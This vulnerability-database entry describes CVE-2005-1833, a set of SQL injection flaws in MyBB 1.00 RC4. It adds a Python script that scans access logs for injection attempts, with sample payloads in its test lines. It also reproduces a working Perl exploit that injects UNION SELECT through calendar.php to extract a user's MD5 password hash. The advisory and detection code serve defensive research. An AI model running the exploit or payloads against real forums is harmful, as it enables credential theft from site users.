MyBulletinBoard (MyBB) 1.00 RC4 Multiple SQL Injection Vulnerabilities

Vulnerability ID: 1108828 | Vulnerability type: SQL injection
Published: 2005-05-31 | Updated: 2005-05-31
CVE ID: CVE-2005-1833
CNNVD-ID: CNNVD-200505-1237
Platform: PHP | CVSS score: 7.5
|Vulnerability Sources
https://www.exploit-db.com/exploits/1022
https://www.securityfocus.com/bid/89186
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200505-1237
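|Vulnerability Details
MyBulletinBoard (MyBB) 1.00 RC4 contains multiple SQL injection vulnerabilities. A remote attacker can execute arbitrary SQL commands via (1) the eid parameter to calendar.php, (2) the idsql parameter to online.php, (3) the usersearch parameter to memberlist.php, (4) the pid parameter to editpost.php, (5) the fid parameter to forumdisplay.php, (6) the tid parameter to newreply.php, (7) the sid parameter to search.php, the (8) tid or (9) pid parameter to showthread.php, (10) the tid parameter to usercp2.php, (11) the tid parameter to printthread.php, or (12) the pid parameter to reputation.php.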
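For triage on a host that ran the affected version, the script/parameter pairs listed above can be checked against web server access logs. The following is an added example, not part of the original advisory or of MyBB; it assumes Apache combined log format, uses a simple heuristic pattern chosen for this example, and runs over constructed sample log lines.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Script -> parameters named in the advisory text above.
AFFECTED = {
    "calendar.php": {"eid"}, "online.php": {"idsql"},
    "memberlist.php": {"usersearch"}, "editpost.php": {"pid"},
    "forumdisplay.php": {"fid"}, "newreply.php": {"tid"},
    "search.php": {"sid"}, "showthread.php": {"tid", "pid"},
    "usercp2.php": {"tid"}, "printthread.php": {"tid"},
    "reputation.php": {"pid"},
}
# Assumed log layout: Apache combined format, request line in double quotes.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Heuristic chosen for this example: quotes, SQL comment markers, statement
# separators, or UNION/SELECT keywords in the URL-decoded parameter value.
SUSPICIOUS = re.compile(r"""['";]|/\*|--|\b(?:union|select)\b""", re.I)

def flag_requests(log_lines):
    """Return (client, script, parameter, decoded value) for each hit."""
    hits = []
    for line in log_lines:
        m = REQUEST.search(line)
        if not m:
            continue
        client = line.split(" ", 1)[0]
        url = urlsplit(m.group(1))
        script = url.path.rsplit("/", 1)[-1].lower()
        # parse_qsl percent-decodes values, so %27 and a raw ' look the same.
        for name, value in parse_qsl(url.query):
            if name in AFFECTED.get(script, ()) and SUSPICIOUS.search(value):
                hits.append((client, script, name, value))
    return hits

# Constructed sample log lines (documentation IP ranges, made-up requests).
SAMPLE_LOG = """\
192.0.2.10 - - [31/May/2005:10:00:01 +0000] "GET /mybb/showthread.php?tid=42 HTTP/1.1" 200 5120
203.0.113.7 - - [31/May/2005:10:00:05 +0000] "GET /mybb/calendar.php?action=event&eid='%20UNION%20SELECT%201/* HTTP/1.1" 200 2048
203.0.113.7 - - [31/May/2005:10:00:09 +0000] "GET /mybb/forumdisplay.php?fid=2%20union%20select%201 HTTP/1.1" 200 2048
192.0.2.10 - - [31/May/2005:10:00:12 +0000] "GET /mybb/member.php?uid=1%27 HTTP/1.1" 200 900
""".splitlines()

if __name__ == "__main__":
    for hit in flag_requests(SAMPLE_LOG):
        print(hit)
```

Access logs record only the query string, so parameters submitted in a POST body are not visible to this check.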
|Exploit
#!/usr/bin/perl -w
#
# SQL Injection Exploit for MyBulletinBoard (MyBB) <= 1.00 RC4
# This exploit show the MD5 crypted password of the user id you've chose
# Related advisory: 
# Patch: http://www.mybboard.com/community/showthread.php?tid=2559
# http://fain182.badroot.org
# http://www.codebug.org
# Discovered by Alberto Trivero and coded with FAiN182

use LWP::Simple;

print "\n\t===========================================\n";
print "\t= Exploit for MyBulletinBoard <= 1.00 RC4 =\n";
print "\t= Alberto Trivero & FAiN182 - codebug.org =\n";
print "\t===========================================\n\n";

if(!$ARGV[0] or !$ARGV[1]) {
   print "Usage:\nperl $0 [full_target_path] [user_id]\n\nExample:\nperl $0 http://www.example.com/mybb/ 1\n";
   exit(0);
}

$url = "calendar.php?action=event&eid='%20UNION%20SELECT%20uid,uid,null,null,null,null,password,null%20FROM%20mybb_users%20WHERE%20uid=$ARGV[1]/*";
$page = get($ARGV[0].$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $ARGV[0]\n";
$page =~ m/<td><strong>(.*?)<\/strong>/ && print "[+] User ID is: $1\n";
print "[-] Unable to retrieve User ID\n" if(!$1);
$page =~ m/<a href="member\.php\?action=profile&uid=">(.*?)<\/a>/ && print "[+] MD5 hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);

# milw0rm.com [2005-05-31]
|Affected Products
MyBulletinBoard MyBulletinBoard 1.00 Rc4
|References

Source: www.mybboard.com
Link: http://www.mybboard.com/community/showthread.php?tid=2559
Source: SECUNIA
Name: 15552
Link: http://secunia.com/advisories/15552
Source: BUGTRAQ
Name: 20050531 Multiple vulnerabilities in MyBulletinBoard (MyBB) 1.00 RC4
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111757191118050&w=2
Source: OSVDB
Name: 17024
Link: http://www.osvdb.org/17024
